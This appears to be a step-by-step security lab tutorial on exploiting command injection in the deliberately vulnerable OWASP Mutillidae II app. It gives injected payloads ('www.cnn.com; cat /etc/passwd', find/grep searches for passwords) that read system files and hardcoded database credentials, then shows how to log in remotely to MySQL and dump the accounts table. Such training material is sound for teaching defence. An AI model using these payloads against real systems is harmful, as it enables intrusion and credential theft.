Bài Hướng Dẫn Mutillidae : Lesson 2 - Command Injection Database Interrogation

{ Command Injection Database Interrogation }

---

Section 0. Background Information

• What Mutillidae?
  • OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiast.
• What is Command Injection?
  • Command Injection occurs when an attacker is able to run operating system commands or serverside scripts from the web application.  This vulnerability potential occurs when a web application allows you to commonly do a nslookup, whois, ping, traceroute and more from their webpage.  You can test for the vulnerability by using a technique called fuzzing, where a ";" or "|" or "||" or "&" or "&&" is append to the end of the expected input (eg., www.cnn.com) followed by a command (eg., cat /etc/passwd).
• What is Fuzzing?
  • Fuzz testing or fuzzing is a software testing technique that involves providing invalid, unexpected, or random data to the inputs of a computer program. The program is then monitored for exceptions such as crashes, or failing built-in code assertions or for finding potential memory leaks. Fuzzing is commonly used to test for security problems in software or computer systems.
• Pre-Requisite Lab
  1. Mutillidae: Lesson 1: How to Install Mutillidae in Fedora
     • Note: Remote database access has been turned to provide an additional vulnerability.
  2. BackTrack: Lesson 1: Installing BackTrack 5 
     • Note: This is not absolutely necessary, but if you are a computer security student or professional, you should have a BackTrack VM.
• Lab Notes
  • In this lab we will do the following:
    1. Exploit a command injection/execution fuzzing vulnerability.
    2. Operating System Reconnaissance
    3. Application home directory Reconnaissance
    4. Database Reconnaissance
    5. Encoding PHP Script to view contents
    6. Remotely connecting to database

• Legal Disclaimer  - không áp dụng các bài hướng dẫn trên hệ thống không có thẩm quyền

Section 1. Configure Fedora14 Virtual Machine Settings

1. Open Your VMware Player
   • Instructions:
     1. On Your Host Computer, Go To
     2. Start --> All Program --> VMWare --> VMWare Player
2. Edit Fedora Mutillidae Virtual Machine Settings
   • Instructions:
     1. Highlight fedora14
     2. Click Edit virtual machine settings
   • 
3. Edit Network Adapter
• Instructions:
  1. Highlight Network Adapter
  2. Select Bridged
  3. Click the OK Button
• 

Section 2. Login to Fedora14 - Mutillidae

1. Start Fedora14 VM Instance
   • Instructions:
     1. Start Up VMWare Player
     2. Select Fedora14 - Mutillidae
     3. Play virtual machine
   • 
2. Login to Fedora14 - Mutillidae
   • Instructions:
     1. Login: student
     2. Password: <whatever you set it to>.
   • 

Section 3. Open Console Terminal and Retrieve IP Address

1. Start a Terminal Console
   • Instructions:
     1. Applications --> Terminal
   • 
2. Switch user to root
   • Instructions:
     1. su - root
     2. <Whatever you set the root password to>
   • 
3. Get IP Address
   • Instructions:
     1. ifconfig -a
   • Notes (FYI):
     • As indicated below, my IP address is 192.168.1.111.
     • Please record your IP address.
   • 

Section 4. Configure BackTrack Virtual Machine Settings

1. Edit the BackTrack5R1 VM
   • Instructions:
     1. Select BackTrack5R1 VM
     2. Click Edit virtual machine settings
   • 
2. Edit Virtual Machine Settings
   • Instructions:
     1. Click on Network Adapter
     2. Click on the Bridged Radio button
     3. Click on the OK Button
   • 

Section 5. Play and Login to BackTrack

1. Play the BackTrack5R1 VM
   • Instructions:
     1. Click on the BackTrack5R1 VM
     2. Click on Play virtual machine
   • 
2. Login to BackTrack
   • Instructions:
     1. Login: root
     2. Password: toor or <whatever you changed it to>.
   • 
3. Bring up the GNOME
   • Instructions:
     1. Type startx
   • 

Section 6. Open Console Terminal and Retrieve IP Address

1. On BackTrack, Start up a terminal window
   • Instructions:
     1. Click on the Terminal Window
   • 
2. Obtain the IP Address
   • Instructions:
     1. ifconfig -a
   • Note(FYI):
     • My IP address 192.168.1.109.
     • In your case, it will probably be different.
     • This is the machine that will be use to attack the victim machine (Metasploitable).
   • 

Section 7. Start Web Browser Session to Mutillidae

1. On BackTrack, Open Firefox
   • Instructions:
     1. Click on the Firefox Icon
   • Notes (FYI):
     • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
   • 
2. Open Mutillidae
   • Notes (FYI):
     • Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
   • Instructions:
     1. http://192.168.1.111/mutillidae
   • 

Section 8. Basic Command Execution Testing

1. Go to DNS Lookup
   • Instructions:
     1. OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Reflected (First Order) --> DNS Lookup
   • 
2. Test DNS Lookup
   • Notes (FYI):
     • DNS Lookup on the surface is design to do just that,,, provide a DNS Lookup.
   • Instructions:
     1. Hostname/IP: www.cnn.com
     2. Click the Lookup DNS button
     3. View your Results
   • 
3. Test DNS Lookup Vulnerability
   • Notes (FYI):
     • Now we will test a security vulnerable that will let us append a Unix/Linux command to the end of the hostname we are looking up.
     • The procedure of appending a ";" after what the application expects, is called command fuzzing.
     • Below you will run the "uname -a" command  
   • Instructions:
     1. Hostname/IP: www.cnn.com; uname -a
     2. Click the Lookup DNS button
     3. View your Results
   • 
4. Perform Reconnaissance
   • Notes (FYI):
     • Don't you think it would be nice to know where there particular web page application is running from?
     • Now we are going to run the "pwd" to show us the current working directory.
     • Also, notice in the Address Bar that the application is called dns-lookup.php  
   • Instructions:
     1. Hostname/IP: www.cnn.com; pwd
     2. Click the Lookup DNS button
     3. View your Results
     4. Notice that dns-lookup.php is the vulnerable program.
   • 
5. Interrogate the dns-lookup.php application
   • Notes (FYI):
     • Just for grins, let's see if we can find the line of code where PHP is executing a system call.
     • I will use the xargs command to search, using egrep, for the following strings: exec OR system OR virtual.  
   • Instructions:
     1. Hostname/IP:
        • www.cnn.com; find /var/www/html/mutillidae -name "dns-lookup.php" | xargs egrep '(exec|system|virtual)'
     2. Click the Lookup DNS button
     3. View your Results
        • Notice there is a function called shell_exec(), that is actually executing the Linux command "nslookup".
   • 

Section 9. Database Reconnaissance

1. Discover the Database Engine using the /etc/passwd file
   • Notes (FYI):
     • Let's search the /etc/passwd file for the following strings: postgres, sql, db2 and ora.  
   • Instructions:
     1. Hostname/IP:
        • www.cnn.com; cat /etc/passwd | egrep -i '(postgres|sql|db2|ora)'
     2. Click the Lookup DNS button
     3. View your Results
        • MySQL is the database engine
   • 
2. Discover the Database Engine using the "ps" command
   • Notes (FYI):
     • Let's use the "ps" command to search for the following process strings: postgres, sql, db2 and ora.  
   • Instructions:
     1. Hostname/IP:
        • www.cnn.com; ps -eaf | egrep -i '(postgres|sql|db2|ora)'
     2. Click the Lookup DNS button
     3. View your Results
        • The mysqld (daemon) is running.
   • 

Section 10. Database Interrogation

1. List all php scripts
   • Notes (FYI):
     • Our next step is to try to figure out if any of the php scripts located under /var/www/html/mutillidae contain a database username and password.
     • But, first list all the php scripts.
   • Instructions:
     1. Hostname/IP:
        • www.cnn.com; find /var/www/html/mutillidae -name "*.php"
     2. Click the Lookup DNS button
     3. View your Results
        • There is over 900+ php scripts.
   • 
2. Search php scripts for the string password
   • Notes (FYI):
     • Now we will search the 900+ php scripts for the string "password" and "=".
   • Instructions:
     1. Hostname/IP:
        • www.cnn.com; find /var/www/html/mutillidae -name "*.php" | xargs grep -i "password" | grep "="
     2. Click the Lookup DNS button
     3. View your Results (Continue to next step).
   • 
3. Obtain password from search results
   • Notes (FYI):
     • Now you have to look closely to see the string password and the actual password "samurai".
   • Instructions:
     1. Notice that the MySQLHandler.php contains the following string:
        • $mMySQLDatabasePassword = "samurai";
   • 
4. Search MySQLHandler.php for the strings user OR login
   • Notes (FYI):
     • We now know that MySQLHandler.php contains the database password.
     • The only thing left it to obtain the database username for the password samarai.
   • Instructions:
     1. Hostname/IP:
        • www.cnn.com; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs egrep -i '(user|login)' | grep "="
     2. Click the Lookup DNS button
     3. View your Results (Continue to next step).
   • 
5. Obtain username from search results
   • Instructions:
     1. Notice that the MySQLHandler.php contains the following string:
        • $mMySQLDatabaseUsername = "root";
     2. Notice the MySQL connection method.
        • mMySQLConnection = new mysqli($HOSTNAME, $USERNAME, $SAMURAI_WTF_PASSWORD);
   • 
6. Display MySQLHandler.php
   • Notes (FYI):
     • I guess I could have showed you this first, but good things come to those that wait.
     • It is possible to display the contents of the MySQLHandler.php program, by encoding the "<?php" and "?>" tags.  These tags tell apache to execute a php script.  To get around this problem and just display the text of the program, we change "<" to "&#60;" and ">" to "&#62;".
   • Instructions:
     1. Hostname/IP:
        • www.cnn.com; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs cat | sed 's/</\&#60;/g' | sed 's/>/\&#62;/g'
     2. Click the Lookup DNS button
     3. View your Results (Continue to next step).
   • 
7. Viewing the Code
   • Notes (FYI):
     • Kind of scary,,, right?
     • Typically, you should never put authentication information into a program that accesses a database on the web.
   • Instructions:
     1. Database Username
        • static public $mMySQLDatabaseUsername = "root";
     2. Database Password
        • static public $mMySQLDatabasePassword = "samurai";
     3. Database Name
        • static public $mMySQLDatabaseName = "nowasp";
   • 

Section 11. Connect Remotely to MySQL

1. On BackTrack, Open a Terminal
   • Instructions:
     1. Click on the Terminal Icon
   • 
2. Connect Remotely to the Mutillidae Database
   • Notes (FYI):
     • Replace 192.168.1.111 with your Mutillidae's IP Address obtained from (Section 3, Step 3)
   • Instructions:
     1. mysql -h 192.168.1.111 -uroot -psamurai
     2. show databases;
     3. use nowasp;
   • 
3. Table Navigation
   • Notes (FYI):
     • Basically, we are looking for a table that contains username and password information.
     • In this case, the account table contain the authentication information.
   • Instructions:
     1. show tables;
     2. desc accounts;
   • 
4. Display Account Table Records
   • Instructions:
     1. select * from accounts;
     2. quit;
   • 

Section 12. Proof of Lab

1. Proof of Lab
   • Notes (FYI):
     • Replace 192.168.1.111 with your Mutillidae's IP Address obtained from (Section 3, Step 3)
   • Instructions:
     1. cd
     2. mysql -h 192.168.1.111 -uroot -psamurai -e "select * from nowasp.accounts" > account.txt
     3. ls -l account.txt
     4. date
     5. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
   • Proof of Lab Instructions:
     1. Do a PrtScn
     2. Paste into a word document
     3. Upload to website www.antoanthongtin.edu.vn
   •